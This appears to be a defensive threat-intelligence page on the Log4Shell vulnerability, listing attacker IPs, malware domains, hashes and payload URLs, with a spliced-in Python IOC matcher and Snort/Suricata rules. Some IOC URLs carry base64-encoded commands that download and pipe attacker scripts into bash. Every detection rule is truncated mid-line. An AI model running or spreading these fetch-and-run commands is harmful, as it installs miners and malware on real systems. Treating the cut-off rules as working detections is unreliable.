Log4Shell attack IPs, malicious server addresses (IOCs) and detection rules


For background on Log4Shell (CVE-2021-44228), refer to the earlier articles:

Attack source IP addresses

Source IPs observed attempting the Apache Log4j RCE; a large share of them are Tor nodes.

1.116.59.211
1.14.17.89
103.103.0.141
103.103.0.142
103.214.5.13
104.244.72.115
104.244.72.129
104.244.72.136
104.244.72.7
104.244.73.126
104.244.73.43
104.244.73.85
104.244.73.93
104.244.74.211
104.244.74.55
104.244.74.57
104.244.75.225
104.244.75.74
104.244.76.13
104.244.76.170
104.244.76.173
104.244.76.44
104.244.77.139
104.244.77.235
104.244.78.213
104.244.79.6
107.189.1.160
107.189.1.178
107.189.10.137
107.189.10.143
107.189.11.153
107.189.12.135
107.189.13.143
107.189.14.182
107.189.14.76
107.189.14.98
107.189.28.100
107.189.28.241
107.189.29.107
107.189.29.41
107.189.3.244
107.189.31.195
107.189.31.241
107.189.8.65
109.237.96.124
109.70.100.22
109.70.100.23
109.70.100.25
109.70.100.26
109.70.100.27
109.70.100.31
109.70.100.34
109.70.100.36
116.24.67.213
121.4.56.143
121.5.219.20
122.161.50.23
128.31.0.13
133.18.201.195
134.122.34.28
135.148.43.32
137.184.102.82
137.184.104.73
137.184.106.119
137.184.28.58
137.184.99.8
138.68.167.19
139.59.8.39
139.59.97.205
140.246.171.141
142.93.151.166
142.93.34.250
143.110.221.204
143.198.32.72
143.198.45.117
145.220.24.19
146.56.131.161
147.182.131.229
147.182.150.124
147.182.154.100
147.182.167.165
147.182.169.254
147.182.198.103
147.182.215.36
147.182.219.9
150.158.189.96
151.115.60.113
151.80.148.159
152.89.239.12
154.39.255.195
154.94.7.88
157.230.32.67
157.245.109.75
159.203.8.145
159.223.9.17
159.65.155.208
159.65.194.103
159.65.3.102
159.65.58.66
161.35.119.60
162.142.125.193
162.142.125.194
162.142.125.195
162.142.125.196
162.142.125.42
162.142.125.43
162.142.125.44
162.142.125.58
162.142.125.59
162.142.125.60
162.247.74.201
162.247.74.202
162.247.74.206
162.247.74.27
162.247.74.7
162.255.202.246
163.172.157.143
163.172.213.212
164.90.199.216
166.70.207.2
167.248.133.113
167.248.133.114
167.248.133.115
167.248.133.116
167.248.133.41
167.248.133.42
167.248.133.43
167.248.133.44
167.248.133.57
167.248.133.58
167.248.133.59
167.248.133.60
167.71.13.196
167.94.138.113
167.94.138.114
167.94.138.115
167.94.138.116
167.94.138.41
167.94.138.42
167.94.138.43
167.94.138.44
167.94.138.57
167.94.138.58
167.94.138.59
167.94.138.60
167.94.145.60
167.99.164.201
167.99.172.213
167.99.172.58
170.210.45.163
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
172.106.17.218
175.6.210.66
176.10.104.240
176.10.99.200
178.17.170.135
178.17.170.23
178.17.171.102
178.17.174.14
178.176.202.121
178.176.203.190
178.20.55.16
178.62.79.49
179.43.187.138
18.27.197.252
180.149.231.245
181.214.39.2
185.10.68.168
185.100.86.128
185.100.87.139
185.100.87.174
185.100.87.202
185.100.87.41
185.107.47.171
185.107.47.215
185.107.70.56
185.129.61.1
185.129.61.4
185.130.44.108
185.14.97.147
185.165.169.18
185.220.100.240
185.220.100.241
185.220.100.242
185.220.100.243
185.220.100.244
185.220.100.245
185.220.100.246
185.220.100.247
185.220.100.248
185.220.100.249
185.220.100.250
185.220.100.251
185.220.100.252
185.220.100.253
185.220.100.254
185.220.100.255
185.220.101.1
185.220.101.10
185.220.101.128
185.220.101.129
185.220.101.131
185.220.101.132
185.220.101.133
185.220.101.134
185.220.101.135
185.220.101.136
185.220.101.137
185.220.101.138
185.220.101.139
185.220.101.14
185.220.101.140
185.220.101.141
185.220.101.142
185.220.101.143
185.220.101.144
185.220.101.145
185.220.101.146
185.220.101.147
185.220.101.148
185.220.101.149
185.220.101.150
185.220.101.151
185.220.101.152
185.220.101.153
185.220.101.154
185.220.101.155
185.220.101.156
185.220.101.157
185.220.101.158
185.220.101.159
185.220.101.16
185.220.101.160
185.220.101.161
185.220.101.162
185.220.101.163
185.220.101.164
185.220.101.165
185.220.101.166
185.220.101.167
185.220.101.168
185.220.101.169
185.220.101.170
185.220.101.171
185.220.101.172
185.220.101.173
185.220.101.174
185.220.101.175
185.220.101.176
185.220.101.177
185.220.101.178
185.220.101.179
185.220.101.180
185.220.101.181
185.220.101.182
185.220.101.183
185.220.101.184
185.220.101.185
185.220.101.186
185.220.101.187
185.220.101.188
185.220.101.189
185.220.101.19
185.220.101.190
185.220.101.191
185.220.101.2
185.220.101.21
185.220.101.3
185.220.101.32
185.220.101.33
185.220.101.34
185.220.101.35
185.220.101.36
185.220.101.37
185.220.101.38
185.220.101.39
185.220.101.40
185.220.101.41
185.220.101.42
185.220.101.43
185.220.101.44
185.220.101.45
185.220.101.46
185.220.101.47
185.220.101.48
185.220.101.49
185.220.101.50
185.220.101.51
185.220.101.52
185.220.101.53
185.220.101.54
185.220.101.55
185.220.101.56
185.220.101.57
185.220.101.58
185.220.101.59
185.220.101.60
185.220.101.61
185.220.101.62
185.220.101.63
185.220.101.7
185.220.101.9
185.220.102.241
185.220.102.242
185.220.102.243
185.220.102.245
185.220.102.246
185.220.102.249
185.220.102.250
185.220.102.252
185.220.102.253
185.220.102.254
185.220.102.4
185.220.102.6
185.220.102.7
185.220.102.8
185.220.103.117
185.220.103.119
185.220.103.4
185.220.103.5
185.220.103.7
185.220.103.8
185.232.23.46
185.236.200.117
185.38.175.130
185.38.175.131
185.38.175.132
185.4.132.183
185.56.80.65
185.83.214.69
188.120.246.215
188.166.122.43
188.166.223.38
188.166.225.104
188.166.48.55
188.166.74.97
188.166.92.228
191.232.38.25
192.160.102.169
192.42.116.19
192.81.130.207
192.99.152.200
193.110.95.34
193.189.100.195
193.189.100.196
193.189.100.201
193.189.100.202
193.189.100.203
193.218.118.183
193.218.118.231
193.239.232.101
193.239.232.102
193.31.24.154
194.135.33.152
194.163.133.36
194.163.45.31
194.48.199.78
195.123.247.209
195.176.3.19
195.176.3.24
195.19.192.26
195.206.105.217
195.251.41.139
195.254.135.76
197.246.171.83
198.144.121.43
198.96.155.3
198.98.51.189
198.98.57.191
198.98.57.207
198.98.60.19
199.195.250.77
199.195.253.162
199.217.117.92
199.249.230.110
199.249.230.158
20.205.104.227
20.71.156.146
204.8.156.142
205.185.115.217
205.185.115.45
205.185.117.149
205.185.126.167
205.185.127.35
206.189.20.141
209.127.17.234
209.127.17.242
209.141.34.232
209.141.36.206
209.141.41.103
209.141.45.189
209.141.45.227
209.141.49.232
211.154.194.21
212.109.197.1
212.192.216.30
212.192.246.95
212.193.57.225
212.47.237.67
213.202.216.189
213.61.215.54
213.95.149.22
216.218.134.12
221.199.187.100
23.120.182.121
23.129.64.131
23.129.64.132
23.129.64.133
23.129.64.135
23.129.64.137
23.129.64.139
23.129.64.140
23.129.64.141
23.129.64.145
23.129.64.146
23.129.64.148
23.129.64.149
23.154.177.2
23.154.177.4
23.154.177.7
23.160.193.176
23.183.83.71
23.184.48.209
3.94.114.30
31.42.184.34
31.42.186.101
35.76.31.198
37.120.232.51
37.123.163.58
37.19.212.104
37.228.129.109
45.12.134.108
45.129.56.200
45.13.104.179
45.130.229.168
45.137.184.31
45.137.21.9
45.15.16.70
45.153.160.130
45.153.160.131
45.153.160.133
45.153.160.134
45.153.160.135
45.153.160.136
45.153.160.138
45.153.160.140
45.153.160.2
45.154.255.147
45.155.205.233
45.61.185.54
45.61.186.225
46.105.95.220
46.166.139.111
46.173.218.146
46.182.21.248
46.4.51.212
47.254.127.78
5.157.38.50
5.182.210.216
5.183.209.217
5.199.143.202
5.2.70.140
5.2.72.73
51.15.180.36
51.15.43.205
51.15.59.15
51.15.76.60
51.255.106.85
51.75.161.78
51.77.52.216
54.173.99.121
60.31.180.149
61.19.25.207
62.102.148.68
62.102.148.69
62.210.130.250
62.76.41.46
64.113.32.29
66.220.242.222
68.183.198.247
68.183.44.143
68.79.17.59
72.223.168.73
79.146.170.248
80.71.158.44
81.17.18.59
81.17.18.60
81.17.18.61
81.17.18.62
82.221.131.71
85.93.218.204
87.118.110.27
88.80.20.86
89.163.154.91
89.163.252.230
89.163.252.30
89.249.63.3
89.35.30.236
91.203.5.146
91.219.237.21
92.223.89.187
92.242.40.21
94.142.241.194
94.230.208.147
95.214.54.97
128.199.15.215
128.199.222.221
134.209.24.42
134.209.82.14
137.184.98.176
138.197.106.234
138.197.108.154
138.197.167.229
138.197.193.220
138.197.216.230
138.197.72.76
138.197.9.239
138.68.155.222
138.68.250.214
139.59.101.242
139.59.103.254
139.59.108.31
139.59.163.74
139.59.182.104
139.59.188.119
142.93.157.150
143.110.221.219
143.198.180.150
143.198.183.66
147.182.179.141
147.182.187.229
147.182.216.21
157.245.129.50
159.203.187.141
159.203.45.181
159.203.58.73
159.223.42.182
159.223.61.102
159.89.115.238
159.89.122.19
159.89.133.216
159.89.146.147
159.89.150.150
159.89.154.102
159.89.154.185
159.89.154.64
159.89.154.77
159.89.48.173
159.89.94.219
161.35.155.230
161.35.156.13
164.92.254.33
165.22.201.45
165.227.32.109
165.227.37.189
165.232.80.166
165.232.80.22
165.232.84.226
165.232.84.228
167.172.94.250
167.99.172.99
167.99.186.227
167.99.204.151
167.99.221.217
167.99.221.249
167.99.36.245
167.99.88.151
174.138.6.128
178.128.226.212
178.128.232.114
178.62.23.146
178.62.32.211
188.166.102.47
188.166.105.150
188.166.45.93
188.166.76.204
188.166.86.206
46.101.223.115
51.195.45.190
64.227.67.110
67.205.170.85
68.183.192.239
68.183.198.36
68.183.207.73
68.183.33.144
68.183.35.171
68.183.36.244
68.183.41.150

Malicious attacker servers, domains and file hashes

ioc_category	ioc
DOMAIN	bvprzqhoz7j2ltin.onion.ly
DOMAIN	bvprzqhoz7j2ltin.onion.ws
DOMAIN	bvprzqhoz7j2ltin.tor2web.su
DOMAIN	log.exposedbotnets.ru
DOMAIN	nazi.uy
HASH	0bb39ba78fc976edb9c26de1cecd60eb
HASH	1348a00488a5b3097681b6463321d84c
HASH	1fe52c0b0139660b2335dd7b7c12ea05
HASH	23b317600f4d82ea58c6b39b6eb5a67c
HASH	2615ebcd4c82d8822ce0b58725938cc6
HASH	40e3b969906c1a3315e821a8461216bb
HASH	6d275af23910c5a31b2d9684bbb9c6f3
HASH	7b72cf30ac42c20f0a14b0b87425c00a
HASH	81fbe69a36650504b88756074a36c183
HASH	95d9a068529dd2ea4bb4bef644f5c4f5
HASH	cf2ce888781958e929be430de173a0f8
HASH	d20478a01344026a0ecd60b0b29e9bc1
HASH	f14019c55e7ce19d93838a4b2f6aec12
HASH	0579a8907f34236b754b07331685d79e
HASH	07b7746b922cf7d7fa821123a226ed36
HASH	dbc9125192bd1994cbb764f577ba5dda
HASH	648effa354b3cbaad87b45f48d59c616
HASH	ccef46c7edf9131ccffc47bd69eb743b
IP_PORT	110.42.239.3:80
IP_PORT	114.132.231.19:80
IP_PORT	121.41.109.54:2204
IP_PORT	159.89.182.117:80
IP_PORT	18.228.7.109:80
IP_PORT	210.141.105.67:80
IP_PORT	45.130.229.168:9999
SLD	*.exposedbotnets.ru
SLD	*.nmsl.run
SLD	*.viperdns.xyz
SLD	*.wdnmdnmsl.xyz
URL	http[:]//110.42.239.3/2.hta
URL	http[:]//114.132.231.19/0.hta
URL	http[:]//114.132.231.19/OK1.hta
URL	http[:]//114.132.231.19/hfs.exe
URL	http[:]//114.132.231.19/2.hta
URL	http[:]//138.197.206.223/.x/xmra64
URL	http[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldm
URL	http[:]//18.228.7.109/.log/pty3;
URL	http[:]//18.228.7.109/.log/pty2;
URL	http[:]//18.228.7.109/.log/log
URL	http[:]//18.228.7.109/.log/pty4;
URL	http[:]//18.228.7.109/.log/pty5;
URL	http[:]//18.228.7.109/.log/pty1;
URL	http[:]//18.228.7.109/.log/pty2
URL	http[:]//18.228.7.109/.log/pty5
URL	http[:]//18.228.7.109/.log/pty3
URL	http[:]//18.228.7.109/.log/
URL	http[:]//18.228.7.109/.log/pty1
URL	http[:]//18.228.7.109/.log/pty4
URL	http[:]//210.141.105.67/wp-content/themes/twentythirteen/m8
URL	http[:]//34.221.40.237/.x/
URL	http[:]//45.130.229.168:9999/Exploit.class
URL	http[:]//62.210.130.250/web/admin/x86
URL	http[:]//62.210.130.250/lh.sh
URL	http[:]//62.210.130.250/web/admin/x86_g
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//62.210.130.250/web/admin/
URL	http[:]//62.210.130.250/web/admin/x86
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//62.210.130.250/web/admin/x86_g
URL	185.154.53.140:80
URL	http[:]//185.154.53.140/mg
URL	http[:]//185.154.53.140/o
URL	http[:]//185.154.53.140/s
URL	http[:]//185.154.53.140/get
URL	http[:]//185.154.53.140/ms
URL	http[:]//138.197.206.223/.x/xmra64
URL	http[:]//138.197.206.223/.x/xmra32
URL	http[:]//18.228.7.109/.log/pty1
URL	http[:]//18.228.7.109/.log/pty4
URL	http[:]//210.141.105.67/wp-content/themes/twentythirteen/m8
URL	http[:]//18.228.7.109/.log/pty2
URL	http[:]//18.228.7.109/.log/pty3
URL	http[:]//18.228.7.109/.log/pty5
URL	http[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldm
URL	http[:]//18.228.7.109/.log/log
URL	http[:]//82.118.18.201/cron.sh
URL	http[:]//92.242.40.21/lh2.sh
URL	http[:]//185.191.32.198/lh.sh
URL	http[:]//82.118.18.201/curl-amd64
URL	http[:]//82.118.18.201/libsystem.so
URL	http[:]//82.118.18.201/kinsing
URL	http[:]//82.118.18.201/lh.sh
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//62.210.130.250/lh.sh
URL	http[:]//80.71.158.12/libsystem.so
URL	http[:]//80.71.158.12/curl-amd64
URL	http[:]//80.71.158.12/lh.sh
URL	http[:]//185.191.32.198/unk.sh
URL	http[:]//45.137.155.55/cron.sh
URL	http[:]//185.191.32.198/ex.sh
URL	http[:]//45.137.155.55/ex.sh

URL	http[:]//62.210.130.250/web/admin/x86
URL	http[:]//62.210.130.250/web/admin/x86_g
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//80.71.158.12/kinsing
URL	http[:]//80.71.158.12/curl-amd64
URL	http[:]//92.242.40.21/kinsing
URL	http[:]//92.242.40.21/curl-amd64
URL	http[:]//45.137.155.55/kinsing
URL	http[:]//195.19.192.28/kinsing
URL	http[:]//185.191.32.198/lh.sh
URL	http[:]//80.71.158.44/lh.sh
URL	http[:]//62.210.130.250/lh.sh
URL	http[:]//92.242.40.21/lh.sh
URL	http[:]//92.242.40.21/lh2.sh
HASH	07b7746b922cf7d7fa821123a226ed36
HASH	0e1a1382d4fd420f8a5ae1d88b3085e7
HASH	40e3b969906c1a3315e821a8461216bb
HASH	648effa354b3cbaad87b45f48d59c616
URL	http[:]//45.130.229.168:1389/Exploit
IP_PORT	45.130.229.168:1389
IP_PORT	78.31.71.248:1389
URL	http[:]//78.31.71.248:1389/lewrgz
URL	http[:]//134.209.163.248/callback/
IP_PORT	45.155.205.233:5874
URL	http[:]//45.155.205.233:5874/87.138.139.76:443
IP_PORT	45.155.205.233:12344
URL	http[:]//45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ny4xMzguMTM5Ljc2OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC84Ny4xMzguMTM5Ljc2OjQ0Myl8YmFzaA==

URL	http[:]//015ed9119662.bingsearchlib.com:39356/a
URL	http[:]//32fce0c1f193.bingsearchlib.com:39356/a
URL	http[:]//3be6466b6a20.bingsearchlib.com:39356/a
URL	http[:]//6c8d7dd40593.bingsearchlib.com:39356/a
URL	http[:]//7faf976567f5.bingsearchlib.com:39356/a
URL	http[:]//e86eafcf9294.bingsearchlib.com:39356/a
SLD	*.bingsearchlib.com
IP_PORT	80.71.158.12:5557
IP_PORT	45.155.205.233:12344
URL	http[:]//80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=
URL	http[:]//45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK
URL	http[:]//80.71.158.12/lh.sh
IP_PORT	80.71.158.12:80
IP_PORT	45.155.205.233:5874
URL	http[:]//62.210.130.250/web/admin/x86
URL	http[:]//62.210.130.250/web/admin/x86_g
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//80.71.158.12/kinsing
URL	http[:]//80.71.158.12/libsystem.so
URL	http[:]//80.71.158.12/kinsing
URL	http[:]//45.137.155.55/ex.sh
URL	http[:]//45.137.155.55/kinsing
URL	http[:]//80.71.158.12/libsystem.so
URL	http[:]//80.71.158.12/kinsing
URL	http[:]//80.71.158.12/Exploit69ogQNSQYz.class
HASH	3dfbe75871e218d08328a01c56e1bb42
HASH	648effa354b3cbaad87b45f48d59c616
HASH	ccef46c7edf9131ccffc47bd69eb743b
HASH	cf2ce888781958e929be430de173a0f8
HASH	40e3b969906c1a3315e821a8461216bb
HASH	6d275af23910c5a31b2d9684bbb9c6f3
HASH	1348a00488a5b3097681b6463321d84c
HASH	d9f82dbf8733f15f97fb352467c9ab21
HASH	ff171712ab8816f3d7600fe75bb18052
IP_PORT	45.83.193.150:1389
IP_PORT	31.220.58.29:80
URL	http[:]//45.83.193.150:1389/Exploit
URL	http[:]//31.220.58.29/Exploit.class
URL	http[:]//172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd
IP_PORT	172.105.241.146:80
URL	http[:]//18.228.7.109/.log/log
IP_PORT	18.228.7.109:80
HASH	1718956642fbd382e9cde0c6034f0e21
HASH	c717c47941c150f867ce6a62ed0d2d35
HASH	ceb9a55eaa71101f86b14c6b296066c9
HASH	f6e51ea341570c6e9e4c97aee082822b
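The table above is a flat list in the page's own "ioc_category<TAB>ioc" layout, with URLs defanged as http[:]// and a few entries carrying a stray trailing ";". To make it usable for retro-hunting, here is an added example, not code from the original post: a small Python matcher that parses rows in that layout, refangs the URL column, treats SLD rows as wildcard suffixes, and runs every category over log lines. The table excerpt embedded below takes its values from the page's table; the log lines, the hostname c0ffee.bingsearchlib.com and all function names are constructed for the example.

```python
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

# Constructed excerpt in the page's "ioc_category<TAB>ioc" layout; values are from the page's table.
IOC_TABLE = """ioc_category\tioc
DOMAIN\tlog.exposedbotnets.ru
SLD\t*.bingsearchlib.com
IP_PORT\t45.130.229.168:9999
URL\thttp[:]//62.210.130.250/lh.sh
URL\thttp[:]//18.228.7.109/.log/pty3;
HASH\t648effa354b3cbaad87b45f48d59c616
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
IP_PORT_RE = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3}):(\d{1,5})\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)  # the page's HASH column is MD5


def refang(value: str) -> str:
    """Undo the page's defanging (http[:]// -> http://) and drop trailing ';' debris."""
    return value.replace("[:]", ":").replace("[.]", ".").rstrip(";").strip()


def load_iocs(table: str) -> Dict[str, Set[str]]:
    """Parse 'category<TAB>value' rows into lower-cased sets keyed by category."""
    iocs: Dict[str, Set[str]] = {}
    for line in table.splitlines():
        if not line.strip() or line.startswith("ioc_category"):
            continue  # blank line or header row
        category, _, value = line.partition("\t")
        if not value:
            continue  # malformed row without a tab separator
        iocs.setdefault(category.strip().upper(), set()).add(refang(value).lower())
    return iocs


def sld_match(host: str, pattern: str) -> bool:
    """'*.example.com' matches example.com itself and any subdomain of it."""
    suffix = pattern[2:] if pattern.startswith("*.") else pattern
    return host == suffix or host.endswith("." + suffix)


def scan_line(line: str, iocs: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """Return (category, ioc) pairs found in one log line, in discovery order."""
    hits: List[Tuple[str, str]] = []
    seen: Set[Tuple[str, str]] = set()

    def add(category: str, value: str) -> None:
        if (category, value) not in seen:
            seen.add((category, value))
            hits.append((category, value))

    low = line.lower()
    hosts: Set[str] = set()
    for url in URL_RE.findall(low):
        url = url.rstrip(".,;)")  # punctuation glued to the URL by the log format
        if url in iocs.get("URL", set()):
            add("URL", url)
        parsed = urlparse(url)
        if parsed.hostname:
            hosts.add(parsed.hostname)
    for ip, port in IP_PORT_RE.findall(low):  # bare ip:port tokens (callbacks, LDAP refs)
        if f"{ip}:{port}" in iocs.get("IP_PORT", set()):
            add("IP_PORT", f"{ip}:{port}")
    hosts.update(HOST_RE.findall(low))  # hostnames outside URLs, e.g. DNS qname fields
    for host in hosts:
        if host in iocs.get("DOMAIN", set()):
            add("DOMAIN", host)
        for pattern in iocs.get("SLD", set()):
            if sld_match(host, pattern):
                add("SLD", pattern)
    for digest in MD5_RE.findall(low):
        if digest in iocs.get("HASH", set()):
            add("HASH", digest)
    return hits


def scan(lines: List[str], iocs: Dict[str, Set[str]]) -> List[Tuple[int, str, str]]:
    """Scan many lines; return (line_index, category, ioc) for every hit."""
    return [(i, c, v) for i, line in enumerate(lines) for c, v in scan_line(line, iocs)]


# Constructed log lines (proxy, application, DNS and EDR formats are invented here).
SAMPLE_LOGS = [
    '2021-12-13T10:41:07Z proxy src=10.0.0.5 method=GET url="http://62.210.130.250/lh.sh" status=200',
    "2021-12-13T10:41:09Z app ldap lookup to 45.130.229.168:9999 from pid 4412",
    "2021-12-13T10:41:12Z dns query qname=c0ffee.bingsearchlib.com qtype=A",
    "2021-12-13T10:41:15Z dns query qname=log.exposedbotnets.ru qtype=A",
    "2021-12-13T10:42:30Z edr file_create path=/tmp/kinsing md5=648EFFA354B3CBAAD87B45F48D59C616",
    '2021-12-13T10:43:00Z proxy src=10.0.0.7 method=GET url="https://www.example.org/index.html" status=200',
]

if __name__ == "__main__":
    for idx, category, value in scan(SAMPLE_LOGS, load_iocs(IOC_TABLE)):
        print(f"line {idx}: {category} {value}")
```

The matcher lower-cases both sides, so the mixed-case URL and hash entries in the page's table still match, and the SLD wildcard catches the per-victim random subdomains seen in the bingsearchlib.com rows above. Feed it the whole table and your proxy, DNS and EDR exports to get a first pass; verify any hit against the raw log before acting on it, since the hostname regex is deliberately loose.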

Snort detection rules

If you are not familiar with Snort, see the following article.

alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228)"; flow:established,to_server; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)"; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; flow:established,to_server; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; flow:established,to_server; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; content:"
alert udp $HOME_NET any -> any 53 (msg:"ET POLICY dnslog .cn Observed in DNS Query"; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; flow:established,to_server; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; content:"
alert udp $HOME_NET any -> any 53 (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain"; content:"

Suricata detection rules

Suricata is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS), developed by the Open Information Security Foundation (OISF). A beta was released in December 2009 and the first standard release followed in July 2010.

alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; flow:established,to_server; content:"
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; flow:established,to_server; content:"
alert udp $HOME_NET any -> any 53 (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain"; content:"
alert udp $HOME_NET any -> any 53 (msg:"ET POLICY dnslog .cn Observed in DNS Query"; content:"
